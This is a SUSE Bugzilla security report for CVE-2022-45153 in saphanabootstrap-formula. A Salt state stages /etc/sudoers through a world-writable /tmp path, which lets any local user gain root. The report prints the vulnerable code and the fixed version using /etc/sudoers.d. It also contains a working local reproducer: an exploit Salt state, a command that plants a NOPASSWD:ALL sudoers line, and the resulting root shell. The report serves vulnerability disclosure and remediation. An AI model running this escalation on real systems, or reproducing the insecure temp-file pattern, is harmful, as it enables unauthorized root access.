  <input type="text" class="txt" name="quicksearch" id="quicksearch_bottom" title="Quick Search" value="">
  <input type="submit" class="btn" id="find_bottom" value="Search">
</form>
POST show_bug.cgi?id=1205990
<form action="show_bug.cgi?id=1205990" method="POST" class="mini_login bz_default_hidden" id="mini_login_bottom" onsubmit="return check_mini_login_fields( '_bottom' );">
<input id="Bugzilla_login_bottom" class="bz_login bz_mini_login_help" name="Bugzilla_login" title="Login" onfocus="mini_login_on_focus('_bottom')">
<input class="bz_password bz_default_hidden" id="Bugzilla_password_bottom" name="Bugzilla_password" type="password" title="Password">
<input class="bz_password bz_mini_login_help" type="text" id="Bugzilla_password_dummy_bottom" value="password" title="Password" onfocus="mini_login_on_focus('_bottom')">
<input type="submit" name="GoAheadAndLogIn" value="Log in" id="log_in_bottom">
<script type="text/javascript">
mini_login_constants = {
"login": "login",
"warning": "You must set the login and password before logging in."
};
if (YAHOO.env.ua.gecko || YAHOO.env.ua.ie || YAHOO.env.ua.opera) {
YAHOO.util.Event.onDOMReady(function() {
init_mini_login_form('_bottom');
});
} else {
YAHOO.util.Event.on(window, 'load', function() {
window.setTimeout(function() {
init_mini_login_form('_bottom');
}, 200);
});
}
</script>
<a href="#" onclick="return hide_mini_login_form('_bottom')">[x]</a>
</form>
<form id="testopia_helper_frm"></form>
Text Content
Bugzilla – Bug 1205990 VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbitrary users in hana/ha_cluster.sls
Last modified: 2023-02-07 10:01:26 UTC

Bug 1205990 - (CVE-2022-45153) VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbitrary users in hana/ha_cluster.sls

Summary: VUL-0: CVE-2022-45153: saphanabootstrap-formula: Escalation to root for arbit...
Status: NEW
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other Other
Priority: P3 - Medium
Severity: Normal
Target Milestone: ---
Assigned To: Shapbot Shapbotson
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/349334/
Whiteboard: CVSSv3.1:SUSE:CVE-2022-45153:7.8:(AV:...
Keywords:
Depends on:
Blocks:
Reported: 2022-12-02 15:00 UTC by Johannes Segitz
Modified: 2023-02-07 10:01 UTC
CC List: 3 users (jsegitz, rfrohl, steven.stringer)
See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Description Johannes Segitz 2022-12-02 15:00:41 UTC

Problematic code in hana/ha_cluster.sls

```
48 # Update /etc/sudoers to allow crm operations to the sidadm
49 {% set tmp_sudoers = '/tmp/sudoers' %}
50 {% set sudoers = '/etc/sudoers' %}
51
52 sudoers_backup_{{ sap_instance }}:
53   file.copy:
54     - name: {{ tmp_sudoers }}
55     - source: {{ sudoers }}
56     - unless: cat {{ sudoers }} | grep {{ node.sid.lower() }}adm
57     - require:
58       - stop_hana_{{ sap_instance }}
59
60 sudoers_append_{{ sap_instance }}:
61   file.append:
62     - name: {{ tmp_sudoers }}
63     - text: |
64         {{ node.sid.lower() }}adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana_{{ node.sid.lower() }}_site_srHook_*
65     - require:
66       - sudoers_backup_{{ sap_instance }}
67
68 sudoers_check_{{ sap_instance }}:
69   cmd.run:
70     - name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
71     - require:
72       - sudoers_append_{{ sap_instance }}
73
74 sudoers_edit_{{ sap_instance }}:
75   file.copy:
76     - name: {{ sudoers }}
77     - source: {{ tmp_sudoers }}
78     - force: true
79     - require:
80       - sudoers_check_{{ sap_instance }}
81       - stop_hana_{{ sap_instance }}
```

/tmp/sudoers can be written by arbitrary users. According to https://docs.saltproject.io/en/latest/ref/states/all/salt.states.file.html#salt.states.file.copy it will not overwrite existing files. I need to reproduce it (don't have a working salt setup ATM), but every user should be able to write an arbitrary sudoers, place it there and then this will copy it into /etc

[Reviewer note: the sudoers_check step in between does not prevent this, because `visudo -c -f` only validates the file's syntax, so a well-formed file that already exists at the predictable /tmp path passes the check and is then copied over /etc/sudoers by sudoers_edit (`force: true`).]

CVE assignment and reproducer next week

Comment 3 Steven Stringer 2022-12-05 10:11:15 UTC
This issue has already been corrected and is currently awaiting release
SUSE:SLE-12-SP3:Update = IBS request 283896
SUSE:SLE-15:Update = IBS request 283894
SUSE:SLE-15-SP2:Update = IBS request 283895

Comment 4 Johannes Segitz 2022-12-05 12:21:52 UTC
Thanks, but please wait with this. This needs a CVE.
I'm just reproducing it and then I'll assign a CVE

Comment 5 Johannes Segitz 2022-12-05 12:25:08 UTC
Please use CVE-2022-45153

Comment 6 Johannes Segitz 2022-12-05 12:28:01 UTC
Reproducer:
Create stripped down sls file at /usr/share/salt-formulas/states/ha_cluster_exploit.sls

```
{% set tmp_sudoers = '/tmp/sudoers' %}
{% set sudoers = '/etc/sudoers' %}

sudoers_backup:
  file.copy:
    - name: {{ tmp_sudoers }}
    - source: {{ sudoers }}
    - unless: cat {{ sudoers }} | grep adm

sudoers_append:
  file.append:
    - name: {{ tmp_sudoers }}
    - text: |
        adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana__site_srHook_*
    - require:
      - sudoers_backup

sudoers_check:
  cmd.run:
    - name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
    - require:
      - sudoers_append

sudoers_edit:
  file.copy:
    - name: {{ sudoers }}
    - source: {{ tmp_sudoers }}
    - force: true
    - require:
      - sudoers_check
```

as user run (change username)
echo 'johannes ALL=(ALL) NOPASSWD:ALL' > /tmp/sudoers
as root:
salt-call --local state.apply ha_cluster_exploit
then as user:
sudo su
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root)

Comment 7 Johannes Segitz 2022-12-05 12:29:27 UTC
Can't be exploited by the user once this has run, as /tmp/sudoers stays and the users can't overwrite it.

Comment 8 Steven Stringer 2022-12-05 13:51:41 UTC
(In reply to Johannes Segitz from comment #5)
> Please use CVE-2022-45153
Use CVE for what?

Comment 9 Johannes Segitz 2022-12-05 16:07:40 UTC
For the changelog and for tracking this vulnerability internally and externally

Comment 10 Steven Stringer 2022-12-15 08:17:18 UTC
Here's the new code. A tmp file is no longer used and /etc/sudoers is no longer touched. A new file is created (/etc/sudoers.d/SAPHanaSR). To ensure that the new file doesn't break the sudoers config the command `/usr/sbin/visudo -c -f` is run.
```
sudoers_create_{{ sap_instance }}:
  file.managed:
    - source: salt://hana/templates/ha_cluster_sudoers.j2
    - name: {{ sudoers }}
    - template: jinja
    - user: root
    - group: root
    - mode: 0440
    - check_cmd: /usr/sbin/visudo -c -f
    - require:
      - pkg: install_SAPHanaSR
    - context:
        sid: {{ node.sid }}
        sites: {{ sites }}
        sr_hook: {{ sr_hook }}
        sr_hook_multi_target: {{ sr_hook_multi_target }}
        sr_hook_string: __slot__:salt:file.grep({{ sr_hook }}, "^srHookGen = ").stdout
        sustkover_hook: {{ sustkover_hook }}
```

Full file here -> https://github.com/SUSE/saphanabootstrap-formula/blob/main/hana/ha_cluster.sls

Comment 11 Johannes Segitz 2022-12-15 09:12:10 UTC
looks good, thank you

Comment 12 Steven Stringer 2022-12-15 12:08:41 UTC
For your reference, I've added the CVE to the changelog and resubmitted the requests into IBS. Here are the request IDs.
SUSE:SLE-12-SP3:Update 286480
SUSE:SLE-15:Update 286481
SUSE:SLE-15-SP2:Update 286479

Comment 14 Swamp Workflow Management 2023-01-02 14:24:43 UTC
SUSE-SU-2023:0011-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 15 Swamp Workflow Management 2023-01-02 14:25:26 UTC
SUSE-SU-2023:0010-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Module for SAP Applications 15-SP1 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150000.1.19.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 16 Swamp Workflow Management 2023-01-02 14:30:39 UTC
SUSE-SU-2023:0009-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
openSUSE Leap 15.4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
openSUSE Leap 15.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.